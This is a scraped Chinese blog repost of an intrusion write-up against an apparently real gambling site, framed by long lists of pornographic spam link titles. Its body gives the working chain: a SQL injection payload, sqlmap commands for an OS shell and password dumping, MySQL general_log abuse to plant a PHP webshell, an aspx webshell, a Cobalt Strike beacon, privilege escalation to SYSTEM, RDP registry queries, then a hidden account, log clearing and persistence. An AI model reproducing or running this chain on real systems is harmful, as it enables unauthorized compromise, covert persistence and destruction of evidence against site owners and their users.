日韩性视频-久久久蜜桃-www中文字幕-在线中文字幕av-亚洲欧美一区二区三区四区-撸久久-香蕉视频一区-久久无码精品丰满人妻-国产高潮av-激情福利社-日韩av网址大全-国产精品久久999-日本五十路在线-性欧美在线-久久99精品波多结衣一区-男女午夜免费视频-黑人极品ⅴideos精品欧美棵-人人妻人人澡人人爽精品欧美一区-日韩一区在线看-欧美a级在线免费观看

歡迎訪問 生活随笔!

生活随笔

當前位置: 首頁 > 编程资源 > 编程问答 >内容正文

编程问答

实战|对某棋牌站的一次getshell

發布時間:2024/1/23 编程问答 30 豆豆
生活随笔 收集整理的這篇文章主要介紹了 实战|对某棋牌站的一次getshell 小編覺得挺不錯的,現在分享給大家,幫大家做個參考.

起因

最近在fofa翻目標C段的時候,碰巧看到了這個站便記了下來,等下班回家后直接拿下。

目標環境信息

BC類的活動頁很多都是thinkphp二改的站,我們主要確定當前tp的版本號。

http://www.abc.com/index.php?s=1

目標環境信息

  • Windows
  • ThinkPHP v.3.2.3
  • 開啟Debug模式
  • 網站絕對路徑 D:\web1\abc.com\wwlsoeprsueords\

用工具掃描日志文件

tp3注入漏洞不存在,日志文件在/addons/Runtime/Logs/admin/路徑下,但并沒有掃到任何的日志文件,猜測日志文件可能為另外一個命名格式

eg. 1606510976-20_11_28.log

時間戳-年_月_日.log

該站點沒有CDN,在fofa上搜IP發現999端口為phpmyadmin頁面

尋找注入

一般來說,這類的活動推廣頁申請進度查詢是存在注入的,用burp抓包

payload如下:

username=123' and (extractvalue(1,concat(0x7e,(select user()),0x7e))))--+&id=13

果不其然,存在注入,還是root權限,直接就上sqlmap跑

python3 sqlmap.py -r 1.txt --random-agent --dbms=mysql --os-shell

還跑了幾種其他類型的注入,但我們直接--os-shell報錯,嘗試了幾次都一樣返回No output,猜測可能有某種防護產品。

getshell

前面我們有找到phpmyadmin頁面,我們枚舉數據庫賬戶和密碼

python3 sqlmap.py –r 1.txt --string="Surname" --users --password

并且已經幫我們解碼明文了,root賬號登錄后報錯#1045 無法登錄服務器,換成dog1賬號登錄成功

phpmyadmin寫shell:

  • 導出文件
  • 寫日志文件

SHOW GLOBAL VARIABLES LIKE "%secure%";

當secure_file_priv的值為null,表示限制mysql不允許導入|導出

當secure_file_priv的值沒有具體值時,表示不對mysql的導入|導出做限制

用命令打開日志保存狀態,設置日志保存路徑

set global general_log = "ON";

set global general_log_file='D:/web1/abc.com/robots.php';

在sql查詢語句處執行我們的php一句話,然后用蟻劍去連日志文件robots.php即可getshell

繞過限制上線cs

查看phpinfo(),發現ban了成噸的函數,無法執行命令。

我們可以上傳aspx馬進行繞過,這里我使用的是冰蝎3的aspx馬

現在可以執行命令了,但還是無法查看相關文件夾等其他問題。

查看系統有無殺軟,準備上線

tasklist /svc

沒有任何殺軟,用cs生成exe上傳到根目錄,然后啟動執行上線

用爛土豆可以直接提到system權限

直接通過注冊表查是否開啟3389,端口號是多少

REG QUERY "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections # 查看RDP服務是否開啟:1關閉,0開啟

REG QUERY "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber # 查看RDP服務的端口

建一個隱藏用戶直接遠程登錄過去,清除日志,做自啟動,拿下該站點

?

?

?

總結

以上是生活随笔為你收集整理的实战|对某棋牌站的一次getshell的全部內容,希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯,歡迎將生活随笔推薦給好友。

主站蜘蛛池模板: 深夜视频一区二区 | 成人免费看毛片 | 欧美日韩在线观看一区 | 国产古装艳史毛片hd | 人妻互换免费中文字幕 | 色女人在线 | 国产精品日韩专区 | 天堂在线1| 69人妻精品久久无人专区 | 在线一区不卡 | 黄网站在线观看视频 | 国产电影一区二区三区爱妃记 | 人妻在卧室被老板疯狂进入 | 99在线免费视频 | 亚洲成人黄色影院 | 九九热最新 | 夜夜av| 久久av网址| 亚洲免费精品 | 制服丝袜av一区二区三区下载 | 日韩亚洲欧美一区二区三区 | 日韩高清一级 | 午夜激情啪啪 | 直接看的av | 日韩高清不卡在线 | 日韩在线精品强乱中文字幕 | 欧美激情一级精品国产 | 在线黄av| 亚洲国产成人综合 | 韩国福利一区 | 奶水旺盛的少妇在线播放 | 免费在线观看视频 | 日韩中文字幕第一页 | 黄色片免费播放 | 黑人一级 | 中文有码一区 | 亚洲素人在线 | 熟女一区二区三区四区 | 国产毛片在线视频 | 欧美性爱视频久久 | 韩日激情视频 | 久久九九国产精品 | 中文字幕乱码人妻无码久久95 | 成人wwxx免费观看 | 激情在线视频 | 欧美一区二三区 | 偷拍视频一区二区 | 国产成人在线一区二区 | 夜夜嗨老熟女av一区二区三区 | 精品福利在线视频 | 中文字幕日韩欧美一区二区 | 思思久久精品 | 国产suv精品一区 | 日本一区二区三区在线视频 | 日本亚洲最大的色成网站www | 久久国产经典视频 | 天天狠天天干 | 啪啪中文字幕 | 黄色网av | 超碰在线国产 | 人妻熟女一区二区三区 | 九久久| 亚洲三级欧美 | 欧美 亚洲 | 日本成人免费视频 | 激情图片在线视频 | 国产精品国色综合久久 | 国产精品久久久一区 | 亚洲精品久久久中文字幕痴女 | 国产精品一区二区三区免费 | 99国产精品视频免费观看一公开 | 一本大道熟女人妻中文字幕在线 | 丝袜人妻一区 | 青青青国产在线 | 日韩免费高清视频 | 99产精品成人啪免费网站 | 91性高潮久久久久久久 | av电影在线网站 | 中文字幕在线视频不卡 | 污视频在线观看网站 | 日韩在线第三页 | 亚洲aaaa级特黄毛片 | 亚洲免费色 | 一二区在线视频 | 亚洲色图15p | 在线天堂中文 | 五月婷婷开心中文字幕 | 成人手机视频 | 亚洲成人福利 | 国产女人18毛片水真多18精品 | 91色九色| 日韩无码电影 | 一级特黄aaaaaa大片 | 蜜臀999 | 伊人成人22| 成人在线观看网站 | 国语一区二区 | 日本三级黄色录像 | 久久久久久久香蕉 |